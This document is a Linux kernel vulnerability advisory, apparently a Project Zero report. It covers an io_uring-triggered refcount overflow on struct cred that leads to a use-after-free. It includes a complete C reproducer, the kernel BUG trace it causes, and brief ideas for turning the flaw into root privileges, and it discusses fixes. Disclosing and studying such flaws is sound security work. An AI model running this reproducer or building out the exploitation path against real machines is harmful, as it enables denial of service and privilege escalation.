Linux 5.6 io_uring Cred Refcount Overflow
Linux versions 5.6 and above appear to suffer from a cred refcount overflow that can be triggered via io_uring using approximately 39 GiB of memory.
Linux >=5.6: cred refcount overflow at ~39 GiB memory usage via io_uring

(see also my related prior bug reports about overflowing refcounts with lots
of RAM usage:
https://crbug.com/project-zero/809: BPF program refcount, with ~32GiB RAM
https://crbug.com/project-zero/1752: page->refcount via FUSE with ~140GiB RAM)

Since commit 071698e13ac6 ("io_uring: allow registering credentials"), landed
in 5.6, it has been possible to grab references to `struct cred` very
efficiently - by repeatedly calling the syscall
`io_uring_register(fd, IORING_REGISTER_PERSONALITY, NULL, 0)`, it is possible
to register up to 0xffff refcounted pointers to `struct cred` in an xarray
(or in older kernel versions, in an IDR). These pointers can all be pointing
to the same `struct cred`.

By using a bunch of io_uring instances, that makes it possible to create a
lot of refcounted references to `struct cred` at a very efficient and low
amortized memory cost of less than 10 bytes per reference.

`struct cred` is refcounted using the member `atomic_t usage`, which is a
plain signed 32-bit atomic counter with no overflow checking.
I believe there is some history here where Elena Reshetova and Kees Cook have
been trying to turn it into a `refcount_t`, which would also fix this kind of
issue by marking the refcount as "saturated" when it reaches 2^31 and then
never freeing the object. Most recently there was this thread, where Kees
tried to get that change in; there was some discussion, but I don't think
anything has landed so far:
<https://lore.kernel.org/all/[email protected]/>

So by using ~39 GiB of physical memory, it is possible to store 2^32
references to `struct cred` and overflow the reference counter. That's not
exactly a small amount of RAM, but I guess a lot of servers probably have that
much RAM?
At least cloud providers like AWS sell machines with much more RAM
than that.

I am including as recipients both akpm (who is the maintainer for
kernel/cred.c and was involved in the linked discussion) and the io_uring
maintainers (though io_uring, in my opinion, isn't really where the core issue
here lies, but it happened to make it possible to hit this overflow using a
fairly small amount of physical memory).

Reproducer (compile with -pthread; requires ~39GiB of physical RAM, I tested it
in a VM so that the host machine could swap a bit):
============
#define _GNU_SOURCE
#include <pthread.h>
#include <unistd.h>
#include <err.h>
#include <fcntl.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <sys/prctl.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/eventfd.h>
#include <linux/io_uring.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

// power of 2
#define PARALLELISM 4

static int efd;

static void *thread_fn(void *dummy) {
  for (long refcount = 0; refcount < (1UL<<32)/PARALLELISM;) {
    struct io_uring_params params = {
      .flags = IORING_SETUP_NO_SQARRAY
    };
    int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));
    printf("uring_fd = 0x%x\n", (unsigned int)uring_fd);
    for (int i=0; i<0xffff; i++, refcount++)
      SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PERSONALITY, NULL, 0));
  }
  printf("one thread ready\n");
  eventfd_write(efd, 1);
  while (1) pause();
}

int main(void) {
  setbuf(stdout, NULL);
  sync();
  struct rlimit rlim;
  SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim));
  if (rlim.rlim_max < 65550)
    printf("WARNING: RLIMIT_NOFILE maximum is probably too low\n");
  rlim.rlim_cur = rlim.rlim_max;
  SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim));
  efd = SYSCHK(eventfd(0, 0));
  pthread_t threads[PARALLELISM];
  for (int i = 0; i < PARALLELISM; i++) {
    if (pthread_create(threads+i, NULL, thread_fn,
        NULL))
      errx(1, "pthread_create");
  }
  for (int i=0; i<4;) {
    eventfd_t val;
    SYSCHK(eventfd_read(efd, &val));
    i += val;
  }
  printf("refs should have wrapped. press ctrl+c for uaf on cleanup.\n");
  while (1) pause();
}
============

The reproducer takes a while to run; when it's done and the cred refcount has
been wrapped, you can press ctrl+c to make the process exit, which will
repeatedly decrement the cred refcount until the cred refcount reaches zero
(when there are actually 2^32 references remaining).
At that point, it'll hit the `BUG_ON(cred == current->cred)` check in
`__put_cred()`, since the reproducer doesn't go out of its way to avoid this
check:
============
kernel BUG at kernel/cred.c:150!
invalid opcode: 0000 [#1] PREEMPT SMP
CPU: 2 PID: 580 Comm: uring-credref Not tainted 6.7.0-rc3 #362
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
RIP: 0010:__put_cred+0x55/0x60
Code: 87 a0 00 00 00 85 c0 74 0c 48 81 c7 a0 00 00 00 e9 b0 fe ff ff 48 81 c7 a0 00 00 00 48 c7 c6 40 39 0d b0 e9 9d 53 07 00 0f 0b <0f> 0b 0f 0b 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90
RSP: 0018:ffffb2e382b5bcf0 EFLAGS: 00010246
RAX: ffff8c4e21c6c080 RBX: ffff8c52fce02000 RCX: ffffb2e382b5bc94
RDX: 0000000000000001 RSI: ffff8c52fce025c0 RDI: ffff8c4e1f2c2480
RBP: ffff8c52fce025a8 R08: ffffb2e382b5bc98 R09: 0000000000000007
R10: 0000000000000001 R11: 0000000000000001 R12: ffff8c52fce02040
R13: ffff8c4e072fc520 R14: ffff8c576139c9c0 R15: ffff8c4e21c6c938
FS: 0000000000000000(0000) GS:ffff8c598dd00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000055a8bdfd1d70 CR3: 0000000411e47001 CR4: 0000000000770ef0
PKRU: 55555554
Call Trace:
 <TASK>
 [...]
 io_ring_ctx_wait_and_kill+0xa8/0x180
 io_uring_release+0x20/0x30
 __fput+0x92/0x2c0
 task_work_run+0x5a/0x90
 do_exit+0x36c/0xbc0
 do_group_exit+0x37/0xa0
 get_signal+0xbcf/0xbd0
 arch_do_signal_or_restart+0x3e/0x270
 exit_to_user_mode_prepare+0xba/0x110
 syscall_exit_to_user_mode+0x21/0x50
 do_syscall_64+0x52/0xf0
 entry_SYSCALL_64_after_hwframe+0x6e/0x76
RIP: 0033:0x7ff41d547d92
Code: Unable to access opcode bytes at 0x7ff41d547d68.
RSP: 002b:00007ff41d370e30 EFLAGS: 00000293 ORIG_RAX: 0000000000000022
RAX: fffffffffffffdfe RBX: 000000004000bfff RCX: 00007ff41d547d92
RDX: 0000000000000008 RSI: 00007ff41d370e38 RDI: 0000000000000000
RBP: 000000000000ffc1 R08: 0000000000000000 R09: 0000008000000040
R10: 0000000000000000 R11: 0000000000000293 R12: 000000004000bfff
R13: 00007ff41d370e50 R14: 00007ff41d370e50 R15: 0000000000000000
 </TASK>
Modules linked in:
---[ end trace 0000000000000000 ]---
RIP: 0010:__put_cred+0x55/0x60
Code: 87 a0 00 00 00 85 c0 74 0c 48 81 c7 a0 00 00 00 e9 b0 fe ff ff 48 81 c7 a0 00 00 00 48 c7 c6 40 39 0d b0 e9 9d 53 07 00 0f 0b <0f> 0b 0f 0b 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90
RSP: 0018:ffffb2e382b5bcf0 EFLAGS: 00010246
RAX: ffff8c4e21c6c080 RBX: ffff8c52fce02000 RCX: ffffb2e382b5bc94
RDX: 0000000000000001 RSI: ffff8c52fce025c0 RDI: ffff8c4e1f2c2480
RBP: ffff8c52fce025a8 R08: ffffb2e382b5bc98 R09: 0000000000000007
R10: 0000000000000001 R11: 0000000000000001 R12: ffff8c52fce02040
R13: ffff8c4e072fc520 R14: ffff8c576139c9c0 R15: ffff8c4e21c6c938
FS: 0000000000000000(0000) GS:ffff8c598dd00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000055a8bdfd1d70 CR3: 0000000411e47001 CR4: 0000000000770ef0
PKRU: 55555554
Fixing recursive fault but reboot is needed!
============

A use-after-free of `struct cred` should be exploitable; one method would be
to try to get the freed object allocated again as the `struct cred` of a
root-privileged process, another method would be to try to reallocate the
object with a buffer containing
attacker-controlled data somehow (and then
fake a full capability set in init_user_ns with UIDs set to zero).

While one tempting easy fix here would be to close off avenues for getting
lots of references with little RAM (like somehow making io_uring reuse IDs
with a local usage counter when userspace tries to insert the same
`struct cred` into the xarray multiple times), I think that this example shows
how fragile that method is. It requires knowing about all the various
reference paths that can hold references to `struct cred`, and what kinds of
multipliers or global limits apply at every point in this reference graph.

I think the kernel should be using some flavor of saturating refcounts as the
default choice, at least on machines that have enough RAM to store 2^32
pointers.
If there are specific cases where the overhead is undesirable, I think we
should only omit such a check if we can document exactly how many references
can exist at most, with enough warning comments scattered around to ensure
that the assumptions can't accidentally be broken later on.
(Or the kernel could limit SLUB to a maximum of 32 GiB of memory except for
specially marked slabs that store objects guaranteed to not hold multiple
references to the same object, but I think people would probably hate that
idea.)

(But note that refcount hardening also has value for protecting against bugs
where some repeatedly executed codepath forgets to decrement the refcount,
letting it drift up until it wraps around; and that kind of bug is also
exploitable without using ginormous amounts of RAM.)

This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2024-02-26.

Found by: [email protected]